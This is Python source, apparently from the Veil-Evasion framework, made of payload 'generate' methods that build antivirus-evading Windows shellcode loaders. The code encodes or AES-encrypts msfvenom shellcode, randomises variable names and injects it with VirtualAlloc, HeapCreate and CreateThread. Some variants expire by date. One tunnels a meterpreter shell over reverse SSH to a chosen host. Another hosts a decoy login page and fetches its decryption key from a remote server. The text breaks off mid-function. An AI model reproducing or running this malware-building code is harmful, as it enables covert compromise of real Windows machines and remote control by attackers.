def generate(self): # Generate Shellcode Using msfvenom Shellcode = self.shellcode.generate() # build our your payload sourcecode PayloadCode = "..." # add in a randomized string PayloadCode += helpers.randomString() # example of how to check the internal options if self.required_options["USE_PYHERION"][0].lower() == "y": PayloadCode = encryption.pyherion(PayloadCode) # return everything return PayloadCode
def generate(self): # Generate Shellcode Using msfvenom Shellcode = self.shellcode.generate() # build our your payload sourcecode PayloadCode = "..." # add in a randomized string PayloadCode += helpers.randomString() # example of how to check the internal options if self.required_options["use_pyherion"][0].lower() == "y": PayloadCode = encryption.pyherion(PayloadCode) # return everything return PayloadCode
def generate(self): self._validateArchitecture() python_source = self.required_options["python_source"][0] try: # read in the python source f = open(python_source, 'r') PayloadCode = f.read() f.close() except IOError: print helpers.color("\n [!] python_source file \""+python_source+"\" not found\n", warning=True) return "" # example of how to check the internal options if self.required_options["use_pyherion"][0].lower() == "y": PayloadCode = encryption.pyherion(PayloadCode) # return everything return PayloadCode
def generate(self): self._validateArchitecture() PYTHON_SOURCE = self.required_options["PYTHON_SOURCE"][0] try: # read in the python source f = open(PYTHON_SOURCE, 'r') PayloadCode = f.read() f.close() except IOError: print helpers.color("\n [!] PYTHON_SOURCE file \""+PYTHON_SOURCE+"\" not found\n", warning=True) return "" # example of how to check the internal options if self.required_options["USE_PYHERION"][0].lower() == "y": PayloadCode = encryption.pyherion(PayloadCode) # return everything return PayloadCode
def generate(self): if self.required_options["INJECT_METHOD"][0].lower() == "virtual": if self.required_options["EXPIRE_PAYLOAD"][0].lower() == "x": # Generate Shellcode Using msfvenom Shellcode = self.shellcode.generate(self.required_options) # Base64 Encode Shellcode EncodedShellcode = base64.b64encode(Shellcode) # Generate Random Variable Names ShellcodeVariableName = helpers.randomString() RandPtr = helpers.randomString() RandBuf = helpers.randomString() RandHt = helpers.randomString() RandT = helpers.randomString() randctypes = helpers.randomString() PayloadCode = "import ctypes as " + randctypes + "\n" PayloadCode += "import base64\n" PayloadCode += RandT + ' = "' + EncodedShellcode + '"\n' PayloadCode += ( ShellcodeVariableName + " = bytearray(" + RandT + ".decode('base64','strict').decode(\"string_escape\"))\n" ) PayloadCode += ( RandPtr + " = " + randctypes + ".windll.kernel32.VirtualAlloc(" + randctypes + ".c_int(0)," + randctypes + ".c_int(len(" + ShellcodeVariableName + "))," + randctypes + ".c_int(0x3000)," + randctypes + ".c_int(0x40))\n" ) PayloadCode += ( RandBuf + " = (" + randctypes + ".c_char * len(" + ShellcodeVariableName + ")).from_buffer(" + ShellcodeVariableName + ")\n" ) PayloadCode += ( randctypes + ".windll.kernel32.RtlMoveMemory(" + randctypes + ".c_int(" + RandPtr + ")," + RandBuf + "," + randctypes + ".c_int(len(" + ShellcodeVariableName + ")))\n" ) PayloadCode += ( RandHt + " = " + randctypes + ".windll.kernel32.CreateThread(" + randctypes + ".c_int(0)," + randctypes + ".c_int(0)," + randctypes + ".c_int(" + RandPtr + ")," + randctypes + ".c_int(0)," + randctypes + ".c_int(0)," + randctypes + ".pointer(" + randctypes + ".c_int(0)))\n" ) PayloadCode += ( randctypes + ".windll.kernel32.WaitForSingleObject(" + randctypes + ".c_int(" + RandHt + ")," + randctypes + ".c_int(-1))\n" ) if self.required_options["USE_PYHERION"][0].lower() == "y": PayloadCode = encryption.pyherion(PayloadCode) return PayloadCode else: # Get our current date and add number of days to the date todaysdate = date.today() expiredate = str(todaysdate + timedelta(days=int(self.required_options["EXPIRE_PAYLOAD"][0]))) # Generate Shellcode Using msfvenom Shellcode = self.shellcode.generate(self.required_options) # Base64 Encode Shellcode EncodedShellcode = base64.b64encode(Shellcode) # Generate Random Variable Names ShellcodeVariableName = helpers.randomString() RandPtr = helpers.randomString() RandBuf = helpers.randomString() RandHt = helpers.randomString() RandT = helpers.randomString() RandToday = helpers.randomString() RandExpire = helpers.randomString() randctypes = helpers.randomString() PayloadCode = "import ctypes as " + randctypes + "\n" PayloadCode += "import base64\n" PayloadCode += "from datetime import datetime\n" PayloadCode += "from datetime import date\n\n" PayloadCode += RandToday + " = datetime.now()\n" PayloadCode += RandExpire + ' = datetime.strptime("' + expiredate[2:] + '","%y-%m-%d") \n' PayloadCode += "if " + RandToday + " < " + RandExpire + ":\n" PayloadCode += "\t" + RandT + ' = "' + EncodedShellcode + '"\n' PayloadCode += ( "\t" + ShellcodeVariableName + " = bytearray(" + RandT + ".decode('base64','strict').decode(\"string_escape\"))\n" ) PayloadCode += ( "\t" + RandPtr + " = " + randctypes + ".windll.kernel32.VirtualAlloc(" + randctypes + ".c_int(0)," + randctypes + ".c_int(len(" + ShellcodeVariableName + "))," + randctypes + ".c_int(0x3000)," + randctypes + ".c_int(0x40))\n" ) PayloadCode += ( "\t" + RandBuf + " = (" + randctypes + ".c_char * len(" + ShellcodeVariableName + ")).from_buffer(" + ShellcodeVariableName + ")\n" ) PayloadCode += ( "\t" + randctypes + ".windll.kernel32.RtlMoveMemory(" + randctypes + ".c_int(" + RandPtr + ")," + RandBuf + "," + randctypes + ".c_int(len(" + ShellcodeVariableName + ")))\n" ) PayloadCode += ( "\t" + RandHt + " = " + randctypes + ".windll.kernel32.CreateThread(" + randctypes + ".c_int(0)," + randctypes + ".c_int(0)," + randctypes + ".c_int(" + RandPtr + ")," + randctypes + ".c_int(0)," + randctypes + ".c_int(0)," + randctypes + ".pointer(" + randctypes + ".c_int(0)))\n" ) PayloadCode += ( "\t" + randctypes + ".windll.kernel32.WaitForSingleObject(" + randctypes + ".c_int(" + RandHt + ")," + randctypes + ".c_int(-1))\n" ) if self.required_options["USE_PYHERION"][0].lower() == "y": PayloadCode = encryption.pyherion(PayloadCode) return PayloadCode if self.required_options["INJECT_METHOD"][0].lower() == "heap": if self.required_options["EXPIRE_PAYLOAD"][0].lower() == "x": # Generate Shellcode Using msfvenom Shellcode = self.shellcode.generate(self.required_options) # Base64 Encode Shellcode EncodedShellcode = base64.b64encode(Shellcode) # Generate Random Variable Names ShellcodeVariableName = helpers.randomString() RandPtr = helpers.randomString() RandBuf = helpers.randomString() RandHt = helpers.randomString() RandT = helpers.randomString() HeapVar = helpers.randomString() randctypes = helpers.randomString() PayloadCode = "import ctypes as " + randctypes + "\n" PayloadCode += "import base64\n" PayloadCode += RandT + ' = "' + EncodedShellcode + '"\n' PayloadCode += ( ShellcodeVariableName + " = bytearray(" + RandT + ".decode('base64','strict').decode(\"string_escape\"))\n" ) PayloadCode += ( HeapVar + " = " + randctypes + ".windll.kernel32.HeapCreate(" + randctypes + ".c_int(0x00040000)," + randctypes + ".c_int(len(" + ShellcodeVariableName + ") * 2)," + randctypes + ".c_int(0))\n" ) PayloadCode += ( RandPtr + " = " + randctypes + ".windll.kernel32.HeapAlloc(" + randctypes + ".c_int(" + HeapVar + ")," + randctypes + ".c_int(0x00000008)," + randctypes + ".c_int(len( " + ShellcodeVariableName + ")))\n" ) PayloadCode += ( RandBuf + " = (" + randctypes + ".c_char * len(" + ShellcodeVariableName + ")).from_buffer(" + ShellcodeVariableName + ")\n" ) PayloadCode += ( randctypes + ".windll.kernel32.RtlMoveMemory(" + randctypes + ".c_int(" + RandPtr + ")," + RandBuf + "," + randctypes + ".c_int(len(" + ShellcodeVariableName + ")))\n" ) PayloadCode += ( RandHt + " = " + randctypes + ".windll.kernel32.CreateThread(" + randctypes + ".c_int(0)," + randctypes + ".c_int(0)," + randctypes + ".c_int(" + RandPtr + ")," + randctypes + ".c_int(0)," + randctypes + ".c_int(0)," + randctypes + ".pointer(" + randctypes + ".c_int(0)))\n" ) PayloadCode += ( randctypes + ".windll.kernel32.WaitForSingleObject(" + randctypes + ".c_int(" + RandHt + ")," + randctypes + ".c_int(-1))\n" ) if self.required_options["USE_PYHERION"][0].lower() == "y": PayloadCode = encryption.pyherion(PayloadCode) return PayloadCode else: # Get our current date and add number of days to the date todaysdate = date.today() expiredate = str(todaysdate + timedelta(days=int(self.required_options["EXPIRE_PAYLOAD"][0]))) # Generate Shellcode Using msfvenom Shellcode = self.shellcode.generate(self.required_options) # Base64 Encode Shellcode EncodedShellcode = base64.b64encode(Shellcode) # Generate Random Variable Names ShellcodeVariableName = helpers.randomString() RandPtr = helpers.randomString() RandBuf = helpers.randomString() RandHt = helpers.randomString() RandT = helpers.randomString() HeapVar = helpers.randomString() RandToday = helpers.randomString() RandExpire = helpers.randomString() randctypes = helpers.randomString() PayloadCode = "import ctypes as " + randctypes + "\n" PayloadCode += "import base64\n" PayloadCode += "from datetime import datetime\n" PayloadCode += "from datetime import date\n\n" PayloadCode += RandToday + " = datetime.now()\n" PayloadCode += RandExpire + ' = datetime.strptime("' + expiredate[2:] + '","%y-%m-%d") \n' PayloadCode += "if " + RandToday + " < " + RandExpire + ":\n" PayloadCode += "\t" + RandT + ' = "' + EncodedShellcode + '"\n' PayloadCode += ( "\t" + ShellcodeVariableName + " = bytearray(" + RandT + ".decode('base64','strict').decode(\"string_escape\"))\n" ) PayloadCode += ( "\t" + HeapVar + " = " + randctypes + ".windll.kernel32.HeapCreate(" + randctypes + ".c_int(0x00040000)," + randctypes + ".c_int(len(" + ShellcodeVariableName + ") * 2)," + randctypes + ".c_int(0))\n" ) PayloadCode += ( "\t" + RandPtr + " = " + randctypes + ".windll.kernel32.HeapAlloc(" + randctypes + ".c_int(" + HeapVar + ")," + randctypes + ".c_int(0x00000008)," + randctypes + ".c_int(len( " + ShellcodeVariableName + ")))\n" ) PayloadCode += ( "\t" + RandBuf + " = (" + randctypes + ".c_char * len(" + ShellcodeVariableName + ")).from_buffer(" + ShellcodeVariableName + ")\n" ) PayloadCode += ( "\t" + randctypes + ".windll.kernel32.RtlMoveMemory(" + randctypes + ".c_int(" + RandPtr + ")," + RandBuf + "," + randctypes + ".c_int(len(" + ShellcodeVariableName + ")))\n" ) PayloadCode += ( "\t" + RandHt + " = " + randctypes + ".windll.kernel32.CreateThread(" + randctypes + ".c_int(0)," + randctypes + ".c_int(0)," + randctypes + ".c_int(" + RandPtr + ")," + randctypes + ".c_int(0)," + randctypes + ".c_int(0)," + randctypes + ".pointer(" + randctypes + ".c_int(0)))\n" ) PayloadCode += ( "\t" + randctypes + ".windll.kernel32.WaitForSingleObject(" + randctypes + ".c_int(" + RandHt + ")," + randctypes + ".c_int(-1))\n" ) if self.required_options["USE_PYHERION"][0].lower() == "y": PayloadCode = encryption.pyherion(PayloadCode) return PayloadCode else: if self.required_options["EXPIRE_PAYLOAD"][0].lower() == "x": # Generate Shellcode Using msfvenom Shellcode = self.shellcode.generate(self.required_options) # Generate Random Variable Names ShellcodeVariableName = helpers.randomString() RandShellcode = helpers.randomString() RandReverseShell = helpers.randomString() RandMemoryShell = helpers.randomString() DecodedShellcode = helpers.randomString() # Base64 Encode Shellcode EncodedShellcode = base64.b64encode(Shellcode) PayloadCode = "from ctypes import *\n" PayloadCode += "import base64\n" PayloadCode += ShellcodeVariableName + ' = "' + EncodedShellcode + '"\n' PayloadCode += ( DecodedShellcode + " = bytearray(" + ShellcodeVariableName + ".decode('base64','strict').decode(\"string_escape\"))\n" ) PayloadCode += ( RandMemoryShell + " = create_string_buffer(str(" + DecodedShellcode + "), len(str(" + DecodedShellcode + ")))\n" ) PayloadCode += RandShellcode + " = cast(" + RandMemoryShell + ", CFUNCTYPE(c_void_p))\n" PayloadCode += RandShellcode + "()" if self.required_options["USE_PYHERION"][0].lower() == "y": PayloadCode = encryption.pyherion(PayloadCode) return PayloadCode else: # Get our current date and add number of days to the date todaysdate = date.today() expiredate = str(todaysdate + timedelta(days=int(self.required_options["EXPIRE_PAYLOAD"][0]))) # Generate Shellcode Using msfvenom Shellcode = self.shellcode.generate(self.required_options) # Generate Random Variable Names ShellcodeVariableName = helpers.randomString() RandShellcode = helpers.randomString() RandReverseShell = helpers.randomString() RandMemoryShell = helpers.randomString() DecodedShellcode = helpers.randomString() RandToday = helpers.randomString() RandExpire = helpers.randomString() # Base64 Encode Shellcode EncodedShellcode = base64.b64encode(Shellcode) PayloadCode = "from ctypes import *\n" PayloadCode += "import base64\n" PayloadCode += "from datetime import datetime\n" PayloadCode += "from datetime import date\n\n" PayloadCode += RandToday + " = datetime.now()\n" PayloadCode += RandExpire + ' = datetime.strptime("' + expiredate[2:] + '","%y-%m-%d") \n' PayloadCode += "if " + RandToday + " < " + RandExpire + ":\n" PayloadCode += "\t" + ShellcodeVariableName + ' = "' + EncodedShellcode + '"\n' PayloadCode += ( "\t" + DecodedShellcode + " = bytearray(" + ShellcodeVariableName + ".decode('base64','strict').decode(\"string_escape\"))\n" ) PayloadCode += ( "\t" + RandMemoryShell + " = create_string_buffer(str(" + DecodedShellcode + "), len(str(" + DecodedShellcode + ")))\n" ) PayloadCode += "\t" + RandShellcode + " = cast(" + RandMemoryShell + ", CFUNCTYPE(c_void_p))\n" PayloadCode += "\t" + RandShellcode + "()" if self.required_options["USE_PYHERION"][0].lower() == "y": PayloadCode = encryption.pyherion(PayloadCode) return PayloadCode
def generate(self): self.shellcode.SetPayload(["windows/meterpreter/bind_tcp", ["LHOST=127.0.0.1", "LPORT=" + self.required_options["LPORT"][0]]]) Shellcode = self.shellcode.generate() PayloadCode = """from socket import * import paramiko import multiprocessing import time import subprocess import ctypes import thread import threading import select def inject(shellcode): ptr = ctypes.windll.kernel32.VirtualAlloc(ctypes.c_int(0), ctypes.c_int(len(shellcode)), ctypes.c_int(0x3000), ctypes.c_int(0x40)) ctypes.windll.kernel32.VirtualLock(ctypes.c_int(ptr), ctypes.c_int(len(shellcode))) buf = (ctypes.c_char * len(shellcode)).from_buffer(shellcode) ctypes.windll.kernel32.RtlMoveMemory(ctypes.c_int(ptr), buf, ctypes.c_int(len(shellcode))) ht = ctypes.windll.kernel32.CreateThread(ctypes.c_int(0), ctypes.c_int(0), ctypes.c_int(ptr), ctypes.c_int(0), ctypes.c_int(0), ctypes.pointer(ctypes.c_int(0))) ctypes.windll.kernel32.WaitForSingleObject(ctypes.c_int(ht),ctypes.c_int(-1)) def handler(chan, host, port): sock = socket() try: sock.connect((host, port)) except Exception: pass while True: r, w, x = select.select([sock, chan], [], []) if sock in r: data = sock.recv(1024) if len(data) == 0: break chan.send(data) if chan in r: data = chan.recv(1024) if len(data) == 0: break sock.send(data) chan.close() sock.close() def reverse_forward_tunnel(server_port, remote_host, remote_port, transport): transport.request_port_forward('', server_port) while True: chan = transport.accept(1000) if chan is None: continue thr = threading.Thread(target=handler, args=(chan, remote_host, remote_port)) thr.setDaemon(True) thr.start() def main(user,password, rhost, port, shellport): server = [rhost, int(port)] remote = ['127.0.0.1', int(shellport)] client = paramiko.SSHClient() client.load_system_host_keys() client.set_missing_host_key_policy(paramiko.AutoAddPolicy()) try: client.connect(server[0], server[1], username=user, key_filename=None, look_for_keys=False, password=password) except Exception: pass try: reverse_forward_tunnel(int(shellport), remote[0], remote[1], client.get_transport()) except Exception: pass if __name__ == '__main__': multiprocessing.freeze_support() shellcode = r"%s" shellcode = shellcode.decode("string_escape") shellcode = bytearray(shellcode) shellport = "%s" time.sleep(2) p = multiprocessing.Process(target=inject, args=(shellcode,)) jobs = [] jobs.append(p) p.start() user = "******" password = "******" rhost = "%s" port = "%s" time.sleep(3) thread.start_new_thread(main,(user, password, rhost, port, shellport))""" % (Shellcode, self.required_options["LPORT"][0], self.required_options["SSHUSER"][0], self.required_options["SSHPASS"][0], self.required_options["SSHOST"][0], self.required_options["SSHPORT"][0]) if self.required_options["use_pyherion"][0].lower() == "y": PayloadCode = encryption.pyherion(PayloadCode) return PayloadCode
def generate(self): if self.required_options["INJECT_METHOD"][0].lower() == "virtual": if self.required_options["EXPIRE_PAYLOAD"][0].lower() == "x": # Generate Shellcode Using msfvenom Shellcode = self.shellcode.generate(self.required_options) # Base64 Encode Shellcode EncodedShellcode = base64.b64encode(Shellcode) # Generate Random Variable Names ShellcodeVariableName = helpers.randomString() RandPtr = helpers.randomString() RandBuf = helpers.randomString() RandHt = helpers.randomString() RandT = helpers.randomString() PayloadCode = 'import ctypes as avlol\n' PayloadCode += 'import base64\n' PayloadCode += RandT + " = \"" + EncodedShellcode + "\"\n" PayloadCode += ShellcodeVariableName + " = bytearray(" + RandT + ".decode('base64','strict').decode(\"string_escape\"))\n" PayloadCode += RandPtr + ' = avlol.windll.kernel32.VirtualAlloc(avlol.c_int(0),avlol.c_int(len(' + ShellcodeVariableName + ')),avlol.c_int(0x3000),avlol.c_int(0x40))\n' PayloadCode += RandBuf + ' = (avlol.c_char * len(' + ShellcodeVariableName + ')).from_buffer(' + ShellcodeVariableName + ')\n' PayloadCode += 'avlol.windll.kernel32.RtlMoveMemory(avlol.c_int(' + RandPtr + '),' + RandBuf + ',avlol.c_int(len(' + ShellcodeVariableName + ')))\n' PayloadCode += RandHt + ' = avlol.windll.kernel32.CreateThread(avlol.c_int(0),avlol.c_int(0),avlol.c_int(' + RandPtr + '),avlol.c_int(0),avlol.c_int(0),avlol.pointer(avlol.c_int(0)))\n' PayloadCode += 'avlol.windll.kernel32.WaitForSingleObject(avlol.c_int(' + RandHt + '),avlol.c_int(-1))\n' if self.required_options["USE_PYHERION"][0].lower() == "y": PayloadCode = encryption.pyherion(PayloadCode) return PayloadCode else: # Get our current date and add number of days to the date todaysdate = date.today() expiredate = str(todaysdate + timedelta( days=int(self.required_options["EXPIRE_PAYLOAD"][0]))) # Generate Shellcode Using msfvenom Shellcode = self.shellcode.generate(self.required_options) # Base64 Encode Shellcode EncodedShellcode = base64.b64encode(Shellcode) # Generate Random Variable Names ShellcodeVariableName = helpers.randomString() RandPtr = helpers.randomString() RandBuf = helpers.randomString() RandHt = helpers.randomString() RandT = helpers.randomString() RandToday = helpers.randomString() RandExpire = helpers.randomString() PayloadCode = 'import ctypes as avlol\n' PayloadCode += 'import base64\n' PayloadCode += 'from datetime import datetime\n' PayloadCode += 'from datetime import date\n\n' PayloadCode += RandToday + ' = datetime.now()\n' PayloadCode += RandExpire + ' = datetime.strptime(\"' + expiredate[ 2:] + '\",\"%y-%m-%d\") \n' PayloadCode += 'if ' + RandToday + ' < ' + RandExpire + ':\n' PayloadCode += '\t' + RandT + " = \"" + EncodedShellcode + "\"\n" PayloadCode += '\t' + ShellcodeVariableName + " = bytearray(" + RandT + ".decode('base64','strict').decode(\"string_escape\"))\n" PayloadCode += '\t' + RandPtr + ' = avlol.windll.kernel32.VirtualAlloc(avlol.c_int(0),avlol.c_int(len(' + ShellcodeVariableName + ')),avlol.c_int(0x3000),avlol.c_int(0x40))\n' PayloadCode += '\t' + RandBuf + ' = (avlol.c_char * len(' + ShellcodeVariableName + ')).from_buffer(' + ShellcodeVariableName + ')\n' PayloadCode += '\t' + 'avlol.windll.kernel32.RtlMoveMemory(avlol.c_int(' + RandPtr + '),' + RandBuf + ',avlol.c_int(len(' + ShellcodeVariableName + ')))\n' PayloadCode += '\t' + RandHt + ' = avlol.windll.kernel32.CreateThread(avlol.c_int(0),avlol.c_int(0),avlol.c_int(' + RandPtr + '),avlol.c_int(0),avlol.c_int(0),avlol.pointer(avlol.c_int(0)))\n' PayloadCode += '\t' + 'avlol.windll.kernel32.WaitForSingleObject(avlol.c_int(' + RandHt + '),avlol.c_int(-1))\n' if self.required_options["USE_PYHERION"][0].lower() == "y": PayloadCode = encryption.pyherion(PayloadCode) return PayloadCode if self.required_options["INJECT_METHOD"][0].lower() == "heap": if self.required_options["EXPIRE_PAYLOAD"][0].lower() == "x": # Generate Shellcode Using msfvenom Shellcode = self.shellcode.generate(self.required_options) # Base64 Encode Shellcode EncodedShellcode = base64.b64encode(Shellcode) # Generate Random Variable Names ShellcodeVariableName = helpers.randomString() RandPtr = helpers.randomString() RandBuf = helpers.randomString() RandHt = helpers.randomString() RandT = helpers.randomString() HeapVar = helpers.randomString() PayloadCode = 'import ctypes as avlol\n' PayloadCode += 'import base64\n' PayloadCode += RandT + " = \"" + EncodedShellcode + "\"\n" PayloadCode += ShellcodeVariableName + " = bytearray(" + RandT + ".decode('base64','strict').decode(\"string_escape\"))\n" PayloadCode += HeapVar + ' = avlol.windll.kernel32.HeapCreate(avlol.c_int(0x00040000),avlol.c_int(len(' + ShellcodeVariableName + ') * 2),avlol.c_int(0))\n' PayloadCode += RandPtr + ' = avlol.windll.kernel32.HeapAlloc(avlol.c_int(' + HeapVar + '),avlol.c_int(0x00000008),avlol.c_int(len( ' + ShellcodeVariableName + ')))\n' PayloadCode += RandBuf + ' = (avlol.c_char * len(' + ShellcodeVariableName + ')).from_buffer(' + ShellcodeVariableName + ')\n' PayloadCode += 'avlol.windll.kernel32.RtlMoveMemory(avlol.c_int(' + RandPtr + '),' + RandBuf + ',avlol.c_int(len(' + ShellcodeVariableName + ')))\n' PayloadCode += RandHt + ' = avlol.windll.kernel32.CreateThread(avlol.c_int(0),avlol.c_int(0),avlol.c_int(' + RandPtr + '),avlol.c_int(0),avlol.c_int(0),avlol.pointer(avlol.c_int(0)))\n' PayloadCode += 'avlol.windll.kernel32.WaitForSingleObject(avlol.c_int(' + RandHt + '),avlol.c_int(-1))\n' if self.required_options["USE_PYHERION"][0].lower() == "y": PayloadCode = encryption.pyherion(PayloadCode) return PayloadCode else: # Get our current date and add number of days to the date todaysdate = date.today() expiredate = str(todaysdate + timedelta( days=int(self.required_options["EXPIRE_PAYLOAD"][0]))) # Generate Shellcode Using msfvenom Shellcode = self.shellcode.generate(self.required_options) # Base64 Encode Shellcode EncodedShellcode = base64.b64encode(Shellcode) # Generate Random Variable Names ShellcodeVariableName = helpers.randomString() RandPtr = helpers.randomString() RandBuf = helpers.randomString() RandHt = helpers.randomString() RandT = helpers.randomString() HeapVar = helpers.randomString() RandToday = helpers.randomString() RandExpire = helpers.randomString() PayloadCode = 'import ctypes as avlol\n' PayloadCode += 'import base64\n' PayloadCode += 'from datetime import datetime\n' PayloadCode += 'from datetime import date\n\n' PayloadCode += RandToday + ' = datetime.now()\n' PayloadCode += RandExpire + ' = datetime.strptime(\"' + expiredate[ 2:] + '\",\"%y-%m-%d\") \n' PayloadCode += 'if ' + RandToday + ' < ' + RandExpire + ':\n' PayloadCode += '\t' + RandT + " = \"" + EncodedShellcode + "\"\n" PayloadCode += '\t' + ShellcodeVariableName + " = bytearray(" + RandT + ".decode('base64','strict').decode(\"string_escape\"))\n" PayloadCode += '\t' + HeapVar + ' = avlol.windll.kernel32.HeapCreate(avlol.c_int(0x00040000),avlol.c_int(len(' + ShellcodeVariableName + ') * 2),avlol.c_int(0))\n' PayloadCode += '\t' + RandPtr + ' = avlol.windll.kernel32.HeapAlloc(avlol.c_int(' + HeapVar + '),avlol.c_int(0x00000008),avlol.c_int(len( ' + ShellcodeVariableName + ')))\n' PayloadCode += '\t' + RandBuf + ' = (avlol.c_char * len(' + ShellcodeVariableName + ')).from_buffer(' + ShellcodeVariableName + ')\n' PayloadCode += '\tavlol.windll.kernel32.RtlMoveMemory(avlol.c_int(' + RandPtr + '),' + RandBuf + ',avlol.c_int(len(' + ShellcodeVariableName + ')))\n' PayloadCode += '\t' + RandHt + ' = avlol.windll.kernel32.CreateThread(avlol.c_int(0),avlol.c_int(0),avlol.c_int(' + RandPtr + '),avlol.c_int(0),avlol.c_int(0),avlol.pointer(avlol.c_int(0)))\n' PayloadCode += '\tavlol.windll.kernel32.WaitForSingleObject(avlol.c_int(' + RandHt + '),avlol.c_int(-1))\n' if self.required_options["USE_PYHERION"][0].lower() == "y": PayloadCode = encryption.pyherion(PayloadCode) return PayloadCode else: if self.required_options["EXPIRE_PAYLOAD"][0].lower() == "x": # Generate Shellcode Using msfvenom Shellcode = self.shellcode.generate(self.required_options) # Generate Random Variable Names ShellcodeVariableName = helpers.randomString() RandShellcode = helpers.randomString() RandReverseShell = helpers.randomString() RandMemoryShell = helpers.randomString() DecodedShellcode = helpers.randomString() # Base64 Encode Shellcode EncodedShellcode = base64.b64encode(Shellcode) PayloadCode = 'from ctypes import *\n' PayloadCode += 'import base64\n' PayloadCode += ShellcodeVariableName + " = \"" + EncodedShellcode + "\"\n" PayloadCode += DecodedShellcode + " = bytearray(" + ShellcodeVariableName + ".decode('base64','strict').decode(\"string_escape\"))\n" PayloadCode += RandMemoryShell + ' = create_string_buffer(str(' + DecodedShellcode + '), len(str(' + DecodedShellcode + ')))\n' PayloadCode += RandShellcode + ' = cast(' + RandMemoryShell + ', CFUNCTYPE(c_void_p))\n' PayloadCode += RandShellcode + '()' if self.required_options["USE_PYHERION"][0].lower() == "y": PayloadCode = encryption.pyherion(PayloadCode) return PayloadCode else: # Get our current date and add number of days to the date todaysdate = date.today() expiredate = str(todaysdate + timedelta( days=int(self.required_options["EXPIRE_PAYLOAD"][0]))) # Generate Shellcode Using msfvenom Shellcode = self.shellcode.generate(self.required_options) # Generate Random Variable Names ShellcodeVariableName = helpers.randomString() RandShellcode = helpers.randomString() RandReverseShell = helpers.randomString() RandMemoryShell = helpers.randomString() DecodedShellcode = helpers.randomString() RandToday = helpers.randomString() RandExpire = helpers.randomString() # Base64 Encode Shellcode EncodedShellcode = base64.b64encode(Shellcode) PayloadCode = 'from ctypes import *\n' PayloadCode += 'import base64\n' PayloadCode += 'from datetime import datetime\n' PayloadCode += 'from datetime import date\n\n' PayloadCode += RandToday + ' = datetime.now()\n' PayloadCode += RandExpire + ' = datetime.strptime(\"' + expiredate[ 2:] + '\",\"%y-%m-%d\") \n' PayloadCode += 'if ' + RandToday + ' < ' + RandExpire + ':\n' PayloadCode += '\t' + ShellcodeVariableName + " = \"" + EncodedShellcode + "\"\n" PayloadCode += '\t' + DecodedShellcode + " = bytearray(" + ShellcodeVariableName + ".decode('base64','strict').decode(\"string_escape\"))\n" PayloadCode += '\t' + RandMemoryShell + ' = create_string_buffer(str(' + DecodedShellcode + '), len(str(' + DecodedShellcode + ')))\n' PayloadCode += '\t' + RandShellcode + ' = cast(' + RandMemoryShell + ', CFUNCTYPE(c_void_p))\n' PayloadCode += '\t' + RandShellcode + '()' if self.required_options["USE_PYHERION"][0].lower() == "y": PayloadCode = encryption.pyherion(PayloadCode) return PayloadCode
def generate(self): if self.required_options["INJECT_METHOD"][0].lower() == "virtual": TARGET_SERVER = str(self.required_options["TARGET_SERVER"][0]) target_html_file = str(TARGET_SERVER.split('/')[-1]) USER_AGENT = "'User-agent', '" + self.required_options[ 'USER_AGENT'][0] # Generate Shellcode Using msfvenom Shellcode = self.shellcode.generate(self.required_options) # Generate Random Variable Names ShellcodeVariableName = helpers.randomString() RandPtr = helpers.randomString() RandBuf = helpers.randomString() RandHt = helpers.randomString() RandDecodeAES = helpers.randomString() RandCipherObject = helpers.randomString() RandDecodedShellcode = helpers.randomString() RandShellCode = helpers.randomString() RandPadding = helpers.randomString() # Define Random Variable Names for HTTP functions RandResponse = helpers.randomString() RandHttpKey = helpers.randomString() RandMD5 = helpers.randomString() RandKeyServer = helpers.randomString() RandSleep = helpers.randomString() # Define Random Variable Names for HTML Functions RandHttpstring = helpers.randomString() # Genrate Random HTML code for webserver to host key file f = open( str(self.required_options["HTML_FILE_PATH"][0]) + target_html_file, 'w') html_data = """ <!DOCTYPE html> <!--[if IE 8]> <html xmlns="http://www.w3.org/1999/xhtml" class="ie8" lang="en-US"> <![endif]--> <!--[if !(IE 8) ]><!--> <html xmlns="http://www.w3.org/1999/xhtml" lang="en-US"><!--<![endif]--><head> <form name="loginform" id="loginform" action="http://mainpage/wp-login.php" method="post"> <p> <label for="user_login">Username<br> <input name="log" id="user_login" class="input" size="20" type="text"></label> </p> <p> <label for="user_pass">Password<br> <input name="pwd" id="user_pass" class="input" value="" size="20" type="password"></label> </p> <p class="forgetmenot"><label for="rememberme"><input name="rememberme" id="rememberme" value="forever" type="checkbox"> Remember Me</label></p> <p class="submit"> <input name="wp-submit" id="wp-submit" class="button button-primary button-large" value="Log In" type="submit"> <input name="redirect_to" value="http://www.google.com" type="hidden"> <input name="testcookie" value="1" type="hidden"> </p> </form> <p id="nav"> <a rel="nofollow" href="http://www.google.com">Register</a> | <a href="http://www.google.com" title="Password Lost and Found">Lost your password?</a> </p> <p id="backtoblog"><a href="http://" title="Are you lost?">← Back to main page</a></p> </div> <div class="clear"></div> </body></html> """ html_data += '<!--' + RandHttpstring + '-->' html_data = str(html_data) f.write(html_data) f.close() # encrypt the shellcode and grab the HTTP-Md5-Hex Key from new function (EncodedShellcode, secret) = encryption.encryptAES_http_request( Shellcode, html_data) # Create Payload code PayloadCode = 'import ctypes\n' PayloadCode += 'from Crypto.Cipher import AES\n' PayloadCode += 'import base64\n' PayloadCode += 'import os\n' PayloadCode += 'import time\n' PayloadCode += 'import md5\n' PayloadCode += 'import urllib2\n' PayloadCode += 'opener = urllib2.build_opener()\n' PayloadCode += 'opener.addheaders' + ' = ' '[(' + USER_AGENT + '\')]' '\n' # Define Target Server "Key hosting server" PayloadCode += RandKeyServer + ' = ' '"' + TARGET_SERVER + '"' '\n' PayloadCode += 'while True:\n' PayloadCode += ' try:\n' # Open Target Server with HTTP GET request PayloadCode += ' ' + RandResponse + '= opener.open(' + RandKeyServer + ') \n' # Check to see if server returns a 200 code or if not its most likely a 400 code PayloadCode += ' if ' + RandResponse + '.code == 200:\n' # Opening and requesting HTML from Target Server PayloadCode += ' ' + RandHttpKey + ' = opener.open(' + RandKeyServer + ').read()\n' PayloadCode += ' ' + RandMD5 + ' = md5.new()\n' PayloadCode += ' ' + RandHttpKey + ' = str(' + RandHttpKey + ')\n' # Genrate MD5 hash of HTML on page PayloadCode += ' ' + RandMD5 + '.update(' + RandHttpKey + ')\n' # Convert to 16 Byte Hex for AES functions PayloadCode += ' ' + RandHttpKey + ' = ' + RandMD5 + '.hexdigest()\n' # Convert to String for functions PayloadCode += ' ' + RandHttpKey + ' = str(' + RandHttpKey + ')\n' # Break out to decryption PayloadCode += ' break\n' # At any point it fails you will be in sleep for supplied time PayloadCode += ' except 